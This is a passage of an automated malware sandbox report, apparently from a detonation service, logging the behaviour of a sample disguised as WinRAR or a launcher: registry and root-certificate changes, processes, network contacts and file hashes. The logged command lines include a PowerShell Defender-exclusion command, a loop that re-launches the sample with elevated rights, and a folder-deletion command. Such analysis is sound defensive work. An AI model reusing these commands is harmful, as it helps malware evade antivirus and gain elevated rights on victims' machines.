| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240220-en
Max time kernel
1563s
Max time network
1569s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
Files
memory/2196-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240221-en
Max time kernel
1566s
Max time network
1573s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1381s
Max time network
1177s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240215-en
Max time kernel
1565s
Max time network
1572s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
Files
memory/2588-5-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-4-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2588-7-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-8-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-9-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-6-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2588-10-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-11-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-12-0x0000000002CDB000-0x0000000002D42000-memory.dmp
memory/2588-13-0x0000000002CD0000-0x0000000002D50000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1558s
Max time network
1565s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
Network
Files
memory/2096-4-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2096-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2096-5-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/2096-7-0x0000000002CF0000-0x0000000002D70000-memory.dmp
memory/2096-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2096-9-0x0000000002CF0000-0x0000000002D70000-memory.dmp
memory/2096-10-0x0000000002CF0000-0x0000000002D70000-memory.dmp
memory/2096-11-0x0000000002CF0000-0x0000000002D70000-memory.dmp
memory/2096-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1758s
Max time network
1173s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x468
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.98.74.40.in-addr.arpa | udp |
Files
memory/2400-5-0x000001944E760000-0x000001944E782000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qyao1lpi.kqd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2400-10-0x00007FF9B9190000-0x00007FF9B9C51000-memory.dmp
memory/2400-11-0x000001944C5E0000-0x000001944C5F0000-memory.dmp
memory/2400-12-0x000001944C5E0000-0x000001944C5F0000-memory.dmp
memory/2400-13-0x000001944C5E0000-0x000001944C5F0000-memory.dmp
memory/2400-16-0x00007FF9B9190000-0x00007FF9B9C51000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win7-20240221-en
Max time kernel
1796s
Max time network
1820s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/2992-0-0x0000000000100000-0x0000000000101000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabA0F3.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\TarA124.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\TarA38F.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2080-118-0x0000000072E50000-0x00000000733FB000-memory.dmp
memory/2080-129-0x0000000072E50000-0x00000000733FB000-memory.dmp
memory/2080-139-0x0000000002260000-0x00000000022A0000-memory.dmp
memory/2080-140-0x0000000002260000-0x00000000022A0000-memory.dmp
memory/2080-172-0x0000000002260000-0x00000000022A0000-memory.dmp
memory/1376-173-0x00000000001A0000-0x00000000001A1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dc1be7df4bc029baedebb04d094616c |
| SHA1 | dba3192b779f5827f90e2211daa9f1981e952b61 |
| SHA256 | 2573934d570053b3f6156d253abd5c7bf3a5a397a194ab83851319791e7f706d |
| SHA512 | 066b5364a5f31c17f1e471935610908a3e12e19ffefa972657b8ad34ebcc106b199f5ea9c9b088b36b32b0e3edaa4a4a6aacb46e4077ccafa9e13b930feb3df1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8ffd86dd8fa3b504af4c7b7d95780ca0 |
| SHA1 | 6169e677caf912a8de7c56b5cbdd64836b806691 |
| SHA256 | b7d5b14acb517db8618b265f32c3318f26813c9c588bf46d8706590dd7973f87 |
| SHA512 | 0b48c74ed4ac2e0feb0bbd23ee3102cb2511e1d327ffba6cc5f46a0a50ff7c9d6676f6b1d00f100aa31adc134ed3c975730d891aca43116b666123e9bb5f99bf |
memory/1740-243-0x0000000072E50000-0x00000000733FB000-memory.dmp
memory/1740-252-0x0000000002710000-0x0000000002750000-memory.dmp
memory/1740-308-0x0000000072E50000-0x00000000733FB000-memory.dmp
memory/2080-336-0x0000000072E50000-0x00000000733FB000-memory.dmp
memory/2080-337-0x0000000002260000-0x00000000022A0000-memory.dmp
memory/2080-339-0x0000000072E50000-0x00000000733FB000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1586s
Max time network
1573s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x50c
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yj0szi3.ndw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4812-9-0x0000015C417B0000-0x0000015C417D2000-memory.dmp
memory/4812-10-0x00007FFA27FF0000-0x00007FFA28AB1000-memory.dmp
memory/4812-11-0x0000015C27010000-0x0000015C27020000-memory.dmp
memory/4812-12-0x0000015C27010000-0x0000015C27020000-memory.dmp
memory/4812-13-0x0000015C27010000-0x0000015C27020000-memory.dmp
memory/4812-16-0x00007FFA27FF0000-0x00007FFA28AB1000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win10v2004-20240226-en
Max time kernel
1676s
Max time network
1175s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
